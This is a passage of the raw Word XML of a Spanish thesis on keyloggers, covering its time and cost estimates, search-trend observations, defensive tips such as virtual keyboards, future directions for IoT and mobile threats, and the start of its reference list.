        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Tabla \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Coste temporal en horas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="304"/>
    </w:p>
    <w:p w:rsidR="00A75801" w:rsidRPr="00A75801" w:rsidRDefault="00A75801" w:rsidP="00A75801">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Se debe de tener en cuenta que estos tiempos son aproximados y que en algunas tareas concretas puede haber solapamiento pues durante muchas de las tareas ha sido habitual combinar el tiempo con la redacción o la investigación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA4BA9" w:rsidRDefault="001D56AE" w:rsidP="00064628">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B6D5DA6" wp14:editId="0DAE9F3F">
            <wp:extent cx="5400040" cy="335779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3357799"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B029AB" w:rsidRPr="00853E9A" w:rsidRDefault="00BA4BA9" w:rsidP="00BA4BA9">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="305" w:name="_Toc19358266"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>127</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Gráfica de Coste Temporal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="305"/>
    </w:p>
    <w:p w:rsidR="00A75801" w:rsidRDefault="00A75801">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B029AB" w:rsidRPr="00853E9A" w:rsidRDefault="00231F20">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="306" w:name="_Toc421702491"/>
      <w:bookmarkStart w:id="307" w:name="__RefHeading___Toc1108_228935268"/>
      <w:bookmarkStart w:id="308" w:name="_Toc18453547"/>
      <w:bookmarkStart w:id="309" w:name="_Toc19810111"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t>Coste económico</w:t>
      </w:r>
      <w:bookmarkEnd w:id="306"/>
      <w:bookmarkEnd w:id="307"/>
      <w:bookmarkEnd w:id="308"/>
      <w:bookmarkEnd w:id="309"/>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 xml:space="preserve">Para ello nos basaremos en el último supuesto, que sería el coste </w:t>
      </w:r>
      <w:r w:rsidR="000D04F7">
        <w:t xml:space="preserve">que supondría </w:t>
      </w:r>
      <w:r>
        <w:t>para una empresa que ha encargado dicho proyecto</w:t>
      </w:r>
      <w:r w:rsidR="000D04F7">
        <w:t xml:space="preserve"> de investigación</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a una empresa especializada, la cual dispone de trabajadores que han </w:t>
      </w:r>
      <w:r w:rsidR="000D04F7">
        <w:t>llevado a cabo la investigación y desarrollo</w:t>
      </w:r>
      <w:r>
        <w:t>. Evidentemente es el coste más alto, ya que aquí hay que tener en cuenta los sueldos de las personas, los costes de seguridad social, retenciones</w:t>
      </w:r>
      <w:r w:rsidR="007E545A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> irpf, costes de empresa y sumar el beneficio que l</w:t>
      </w:r>
      <w:r w:rsidR="007E545A">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cargue cualquier empresa a su trabajo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00383427" w:rsidRDefault="00652C4D" w:rsidP="000B6054">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hemos establecido un coste </w:t>
      </w:r>
      <w:r w:rsidR="000D04F7">
        <w:t xml:space="preserve">medio </w:t>
      </w:r>
      <w:r>
        <w:t>de 5</w:t>
      </w:r>
      <w:r w:rsidR="00AB2720">
        <w:t>0€ / hora (impuestos no incluidos).</w:t>
      </w:r>
      <w:r w:rsidR="000D04F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB2720" w:rsidRDefault="00AB2720" w:rsidP="000B6054">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Por lo que el coste económico d</w:t>
      </w:r>
      <w:r w:rsidR="00064628">
        <w:t>e este proyecto asciende a 19.0</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w:t>
      </w:r>
      <w:r w:rsidR="00383427">
        <w:t>has menos horas a invertir en la investigación, desarrollo,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y reversing, reduciendo así su coste. Y también se ha de tener en cuenta que un proye</w:t>
      </w:r>
      <w:r w:rsidR="00383427">
        <w:t xml:space="preserve">cto con gran volumen de horas pueda </w:t>
      </w:r>
      <w:r>
        <w:t>factura</w:t>
      </w:r>
      <w:r w:rsidR="00383427">
        <w:t>rse con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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310" w:name="_Toc421702492"/>
      <w:bookmarkStart w:id="311" w:name="__RefHeading___Toc1110_228935268"/>
      <w:bookmarkStart w:id="312" w:name="_Toc18453548"/>
      <w:bookmarkStart w:id="313" w:name="_Toc19810112"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t>Conclusiones</w:t>
      </w:r>
      <w:bookmarkEnd w:id="310"/>
      <w:bookmarkEnd w:id="311"/>
      <w:bookmarkEnd w:id="312"/>
      <w:bookmarkEnd w:id="313"/>
    </w:p>
    <w:p w:rsidR="0045443C" w:rsidRPr="0045443C" w:rsidRDefault="0045443C" w:rsidP="0045443C">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="314" w:name="_Toc19810113"/>
      <w:r w:rsidRPr="0045443C">
        <w:t>Tendencia</w:t>
      </w:r>
      <w:bookmarkEnd w:id="314"/>
    </w:p>
    <w:p w:rsidR="0045443C" w:rsidRDefault="0045443C" w:rsidP="0045443C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Solo se conocen datos de búsqueda en internet desde enero del año 2004, pero se puede extraer cierta información curiosa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045443C" w:rsidRDefault="0045443C" w:rsidP="0045443C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Globalmente el término ha ido decreciendo en su búsqueda, pero empezó fuerte en el inicio del 2004, año en el que coincidió con el gran impacto que tuvo el gusano MyDoom, y obtuvo el máximo pico en Octubre de 2004, fecha en que coincidió con el ataque a entidades bancarias por parte del grupo de Ciberdelincuentes Rusos y ucranianos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045443C" w:rsidRDefault="0045443C" w:rsidP="0045443C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Si nos fijamos en la tendencia de búsqueda en internet, basado en los registros de Google Trends</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1275605871"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Goo \l 3082 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[94]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> (por que no existen otras fuentes) nos podemos hacer una idea del interés de este concepto. Interés que hemos de remarcar que quien lo busca es porque conoce el concepto o ha oído hablar de él y quiere saber más.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045443C" w:rsidRDefault="0045443C" w:rsidP="0045443C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>El principal país (en el período global, desde el año 2004 hasta la actualidad) que realiza búsquedas de este término es Côte d’Ivoire, que casualmente (o no) su idioma principal es el Francés.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045443C" w:rsidRDefault="0045443C" w:rsidP="0045443C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F1FE39D" wp14:editId="056BF2ED">
            <wp:extent cx="4467600" cy="3340800"/>
            <wp:effectExtent l="114300" t="114300" r="104775" b="1454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254" r="1057" b="1528"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4467600" cy="334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443C" w:rsidRDefault="0045443C" w:rsidP="0045443C">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="315" w:name="_Toc19358267"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Tendencia de búsqueda del término «keylogger» desde sus inicios.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="315"/>
    </w:p>
    <w:p w:rsidR="0045443C" w:rsidRPr="00CD0D9E" w:rsidRDefault="0045443C" w:rsidP="0045443C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Si acotamos en los 12 últimos meses, vemos que la tendencia de búsqueda mantiene una cierta estabilidad, no obstante, baja comparada con sus inicios, pero el país que sigue a la cabeza es el mismo. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045443C" w:rsidRDefault="0045443C" w:rsidP="0045443C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19532F5D" wp14:editId="274CBE48">
            <wp:extent cx="4507200" cy="2966400"/>
            <wp:effectExtent l="114300" t="114300" r="103505" b="13906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411" t="2399" r="1681"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4507200" cy="296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443C" w:rsidRDefault="0045443C" w:rsidP="0045443C">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="316" w:name="_Toc19358268"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>129</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Tendencia de búsqueda del término «keylogger» en los últimos 12 meses.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="316"/>
    </w:p>
    <w:p w:rsidR="0045443C" w:rsidRDefault="001F1D72" w:rsidP="00E10C61">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Esto podría ser relevante sobre las sospechas de donde se generan o donde hay mas interés por obtener o desarrollar keyloggers, o simplemente no pudiera no tener nada que ver con ello, pues los verdaderos ciberdelincuentes no harán búsquedas en Google, sino que se moverá por la Dark Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdenotaalpie"/>
        </w:rPr>
        <w:footnoteReference w:id="54"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que por otro lado no tiene información indexada ni existen estadísticas ni herramientas (conocidas) para detectar tendencias.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC499C" w:rsidRDefault="00F4284B" w:rsidP="00F4284B">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="317" w:name="_Toc19810114"/>
      <w:r>
        <w:t>Constatación</w:t>
      </w:r>
      <w:bookmarkEnd w:id="317"/>
    </w:p>
    <w:p w:rsidR="00E10C61" w:rsidRDefault="00F4284B" w:rsidP="00E10C61">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00E10C61">
        <w:t xml:space="preserve">os keyloggers son una de las vías más utilizadas para cometer fraudes cibernéticos, apoyados por técnicas de phishing y ingeniería social, </w:t>
      </w:r>
      <w:r w:rsidR="00D05F2F">
        <w:t>que utilizan complejos sistemas de ocultación y evasión para evitar ser detectados.</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xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F4284B">
        <w:t xml:space="preserve">es indudable que </w:t>
      </w:r>
      <w:r>
        <w:t>la mayoría de los keyloggers pueden ser utilizados</w:t>
      </w:r>
      <w:r w:rsidR="00F4284B">
        <w:t xml:space="preserve"> (y se utilizan)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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F4284B" w:rsidRPr="00E96905" w:rsidRDefault="0073382C" w:rsidP="009D3E43">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r w:rsidRPr="00E96905">
        <w:lastRenderedPageBreak/>
        <w:t>La inversión de</w:t>
      </w:r>
      <w:r w:rsidR="00B24AB6" w:rsidRPr="00E96905">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E96905" w:rsidRPr="00E96905">
        <w:t>desarrollo</w:t>
      </w:r>
      <w:r w:rsidR="00B24AB6" w:rsidRPr="00E96905">
        <w:t xml:space="preserve"> en el cifrado y otras técnicas de ocultación</w:t>
      </w:r>
      <w:r w:rsidR="00F4284B" w:rsidRPr="00E96905">
        <w:t xml:space="preserve"> revelan que</w:t>
      </w:r>
      <w:r w:rsidR="00E96905" w:rsidRPr="00E96905">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F4284B" w:rsidRPr="00E96905">
        <w:t xml:space="preserve"> el esfuerzo empleado</w:t>
      </w:r>
      <w:r w:rsidR="00E96905" w:rsidRPr="00E96905">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F4284B" w:rsidRPr="00E96905">
        <w:t xml:space="preserve"> les ofrece sin duda grandes beneficios. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B24AB6" w:rsidRDefault="00E96905" w:rsidP="009D3E43">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r w:rsidRPr="00E96905">
        <w:t>Estas piezas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de código, aún siendo código malicioso, se pueden considerar verdaderas obras de arte en el campo del desarrollo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B24AB6" w:rsidRDefault="00D05F2F" w:rsidP="009D3E43">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Tal es la complejidad</w:t>
      </w:r>
      <w:r w:rsidR="00B24AB6">
        <w:t xml:space="preserve"> de dicho malware que en la depuración no nos ha sido posible extraer tod</w:t>
      </w:r>
      <w:r w:rsidR="0083490E">
        <w:t>a la información que deseábamos</w:t>
      </w:r>
      <w:r w:rsidR="00B24AB6">
        <w:t>. Aunque si hemos obtenido la evidencia clara de lo que hacía y como lo hacía.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00732BB2" w:rsidRDefault="00732BB2" w:rsidP="00B24AB6">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">De todo esto hemos extraído algunos consejos a seguir que, si bien puede que en un futuro no sirvan, no está de más tenerlos en cuenta y ponerlos en práctica. Lo que es indudable es que los ciberdelincuentes profesionales, los que crean las herramientas, van </w:t>
      </w:r>
      <w:r w:rsidR="0083490E">
        <w:t xml:space="preserve">siempre </w:t>
      </w:r>
      <w:r>
        <w:t>un paso por delante (o dos) de los desarrolladores de sistemas y entornos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00421FE1" w:rsidRDefault="00421FE1" w:rsidP="00421FE1">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="318" w:name="_Toc18453549"/>
      <w:bookmarkStart w:id="319" w:name="_Toc19810115"/>
      <w:r>
        <w:t>Consejos para protegerse contra keyloggers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="318"/>
      <w:bookmarkEnd w:id="319"/>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55"/>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6"/>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lastRenderedPageBreak/>
        <w:t>Usar un teclado virtual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdenotaalpie"/>
        </w:rPr>
        <w:footnoteReference w:id="57"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en el momento de entrar claves o información confidencial</w:t>
      </w:r>
      <w:r w:rsidR="004A730F">
        <w:t xml:space="preserve"> que se deberían de introducir mediante clicks de ratón</w:t>
      </w:r>
      <w:r w:rsidR="004A730F">
        <w:rPr>
          <w:rStyle w:val="Refdenotaalpie"/>
        </w:rPr>
        <w:footnoteReference w:id="58"/>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462C8C2C" wp14:editId="360A60C8">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320" w:name="_Toc19358269"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>130</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de teclado virtual en una operación bancaria.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="320"/>
    </w:p>
    <w:p w:rsidR="00B029AB" w:rsidRDefault="00923263" w:rsidP="00732BB2">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Usar un sistema con protección específica diseñada para detectar keyloggers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00124083" w:rsidRDefault="00124083">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B029AB" w:rsidRPr="00853E9A" w:rsidRDefault="00231F20" w:rsidP="00550235">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="321" w:name="_Toc421702493"/>
      <w:bookmarkStart w:id="322" w:name="__RefHeading___Toc1112_228935268"/>
      <w:bookmarkStart w:id="323" w:name="_Toc18453550"/>
      <w:bookmarkStart w:id="324" w:name="_Toc19810116"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t>Líneas de futuro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="321"/>
      <w:bookmarkEnd w:id="322"/>
      <w:bookmarkEnd w:id="323"/>
      <w:bookmarkEnd w:id="324"/>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CF502A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El keylogger es ya, solo un componente </w:t>
      </w:r>
      <w:r w:rsidR="00AC1B08">
        <w:t xml:space="preserve">más de </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">los </w:t>
      </w:r>
      <w:r w:rsidR="00AC1B08">
        <w:t>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w:t>
      </w:r>
      <w:r w:rsidR="00CF502A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B8403B">
        <w:t xml:space="preserv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w:t>
      </w:r>
      <w:r w:rsidR="00CF502A">
        <w:rPr>
          <w:rStyle w:val="Refdenotaalpie"/>
        </w:rPr>
        <w:footnoteReference w:id="59"/>
      </w:r>
      <w:r w:rsidR="00AC2F23">
        <w:t xml:space="preserve">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 xml:space="preserve">son con diferencia los que tendrán más posibilidades de ser infectados por malware, incluidos keyloggers. Estos dispositivos, no son vistos por los usuarios como potencialmente peligrosos o susceptibles de filtrar información personal, pero pueden ser los principales medios de </w:t>
      </w:r>
      <w:r w:rsidR="00B368C7">
        <w:lastRenderedPageBreak/>
        <w:t>distribución de malware que posteriormente pueda extenderse a una red local en otros equipos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB0A4C" w:rsidRPr="00853E9A" w:rsidRDefault="009C7DA5" w:rsidP="00EC7B03">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Y finalmente, la mayoría de estos esfuerzos en la seguridad trasladarán su centro de mira en los dispositivos móviles</w:t>
      </w:r>
      <w:r w:rsidR="00746C6E">
        <w:t xml:space="preserve"> (teléfonos inteligentes y tabletas)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pues hoy en día los usuarios casi invierten más tiempo usando estos dispositivos</w:t>
      </w:r>
      <w:r w:rsidR="00746C6E">
        <w:t xml:space="preserve"> que ordenadores de sobremesa</w:t>
      </w:r>
      <w:r w:rsidR="00842D37">
        <w:t>. I</w:t>
      </w:r>
      <w:r w:rsidR="00746C6E">
        <w:t>nteractúan constantemente tanto por ocio como por trabajo, e incluso es normal mezclar tareas en estos entornos. Se escriben mensajes y correos electrónicos de trabajo, pero también se instalan aplicaciones indiscriminadamente sin tener en cuenta la seguridad (o la falta de esta) por lo que en un futuro inmediato (de hecho, en el presente también) es donde debe extremarse la seguridad tanto para los keyloggers como el malware en general.</w:t>
      </w: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325" w:name="_Toc421702494"/>
      <w:bookmarkStart w:id="326" w:name="__RefHeading___Toc1114_228935268"/>
    </w:p>
    <w:bookmarkEnd w:id="326" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="325" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="327" w:name="_Toc19810117" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="328" w:name="_Toc18453551" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="329" w:name="_Toc273461648" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="330" w:name="_Toc273480998" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="331" w:name="_Toc273538140" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="332" w:name="_Toc273546782" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-1685204991"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w:rsidR="0007192E" w:rsidRDefault="0007192E" w:rsidP="00550235">
          <w:pPr>
            <w:pStyle w:val="Ttulo1"/>
          </w:pPr>
          <w:r>
            <w:t>Referencias</w:t>
          </w:r>
          <w:bookmarkEnd w:id="328"/>
          <w:bookmarkEnd w:id="327"/>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-573587230"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent>
            <w:p w:rsidR="00DF019A" w:rsidRDefault="0007192E" w:rsidP="007F77A8">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F019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                      <w:rPr>
                        <w:sz w:val="24"/>
                        <w:szCs w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[1] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>K. Collins, «Today we’re worried about smart TVs, but in the 1980s Russian spies were hacking typewriters,» 16 Marzo 2017. [En línea]. Available: https://qz.com/932448/forget-smart-tvs-in-the-1980s-spies-were-hacking-typewriters/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[2] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
